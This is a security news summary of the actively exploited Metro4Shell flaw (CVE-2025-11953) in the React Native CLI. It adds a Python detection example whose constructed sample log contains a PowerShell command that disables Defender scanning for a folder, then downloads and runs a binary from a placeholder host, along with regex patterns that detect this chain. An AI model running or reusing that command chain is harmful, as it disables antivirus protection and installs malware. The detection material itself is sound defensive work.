Hackers Exploit React Native CLI Flaw to Deploy Rust Malware
- Feb 3
Key Findings
Threat actors have been observed exploiting a critical security flaw, CVE-2025-11953, impacting the Metro Development Server in the popular "@react-native-community/cli" npm package.
The vulnerability, also known as "Metro4Shell," allows remote unauthenticated attackers to execute arbitrary operating system commands on the underlying host.
VulnCheck, a cybersecurity company, first observed exploitation of this flaw, which carries a CVSS score of 9.8, on December 21, 2025.
Despite the active exploitation, the activity has yet to see broad public acknowledgment, and the EPSS (Exploit Prediction Scoring System) continues to assign it a low exploitation probability of 0.00405.
Background
The Metro Development Server, which is started by the React Native Community CLI, binds to external interfaces by default. The server exposes an endpoint that is vulnerable to OS command injection, allowing unauthenticated network attackers to send a POST request and run arbitrary executables. On Windows, attackers can also execute arbitrary shell commands with fully controlled arguments.
Exploitation Details
VulnCheck observed consistent, real-world attacks against the vulnerability, with the activity continuing for weeks before broad disclosure.
The threat actors have weaponized the flaw to deliver a Base64-encoded PowerShell script, which performs various actions, including adding Microsoft Defender Antivirus exclusions and retrieving and executing a Rust-based binary payload.
The downloaded binary features anti-analysis checks to hinder static inspection, and the attacks have been found to originate from several IP addresses.
VulnCheck described the activity as neither experimental nor exploratory, but rather consistent and operational, indicating that the attacks were not just proof-of-concept testing.
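The post-exploitation chain described above (an encoded PowerShell script that adds Defender exclusions, then downloads and runs a binary) is something a defender can hunt for in process-creation telemetry. The following is an added detection example, not code from the original report or from VulnCheck; the log records and the decoded scripts are constructed for illustration, and the indicator patterns are assumptions about what such a script would contain.

```python
import base64
import re

# PowerShell's EncodedCommand switch and its common abbreviations (-e, -ec, -enc) followed by Base64.
ENCODED_SWITCH = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Behaviours named in the report: Defender exclusions, then download and execution of a binary.
INDICATORS = {
    "defender_exclusion": re.compile(r"Add-MpPreference\s+-Exclusion", re.IGNORECASE),
    "download": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString", re.IGNORECASE),
    "execute": re.compile(r"Start-Process|Invoke-Expression|\biex\b", re.IGNORECASE),
}

def encode_powershell(script: str) -> str:
    """-EncodedCommand takes Base64 of the UTF-16LE script; used here only to build samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(b64: str):
    """Reverse the encoding; returns None if the blob is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(cmdline: str) -> dict:
    """Decode any encoded script in a command line and report which indicators it hits."""
    match = ENCODED_SWITCH.search(cmdline)
    script = decode_encoded_command(match.group(1)) if match else None
    text = script if script is not None else cmdline
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"encoded": script is not None, "script": script, "hits": hits}

def triage(cmdlines: list) -> list:
    """Alert on a Defender exclusion, or on download plus execute within one command line."""
    alerts = []
    for i, line in enumerate(cmdlines):
        r = analyze(line)
        if "defender_exclusion" in r["hits"] or {"download", "execute"} <= set(r["hits"]):
            alerts.append({"index": i, **r})
    return alerts

# Constructed process-creation records (not from the report): "<parent> -> <command line>".
CONSTRUCTED_LOGS = [
    "node.exe -> powershell.exe -NoProfile -Command Get-Date",
    "node.exe -> powershell.exe -NoProfile -EncodedCommand " + encode_powershell(
        "Add-MpPreference -ExclusionPath 'C:\\Users\\Public'; "
        "Invoke-WebRequest http://example.invalid/p.exe -OutFile C:\\Users\\Public\\p.exe; "
        "Start-Process C:\\Users\\Public\\p.exe"),
    "explorer.exe -> powershell.exe -EncodedCommand " + encode_powershell("Get-Process | Select-Object -First 5"),
]
```

On a Metro host, a powershell.exe child of node.exe is itself worth scrutiny, since the development server normally has no reason to spawn a shell.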
Implications and Recommendations
The lack of public acknowledgment of the exploitation of CVE-2025-11953 risks leaving defenders unprepared, as exploitation often begins well before official recognition.
The vulnerability is easy to exploit, and many exposed servers remain online, making the delay in broader awareness particularly concerning.
VulnCheck emphasized that "CVE-2025-11953 is not remarkable because it exists. It is remarkable because it reinforces a pattern defenders continue to relearn: Development infrastructure becomes production infrastructure the moment it is reachable, regardless of intent."
Sources
https://thehackernews.com/2026/02/hackers-exploit-metro4shell-rce-flaw-in.html
https://securityaffairs.com/187587/hacking/hackers-abused-react-native-cli-flaw-to-deploy-rust-malware-before-public-disclosure.html
https://takedowncyber.com/news/hackers-exploit-react-native-cli-flaw-to-deploy-rust-malware-before-public-disclosure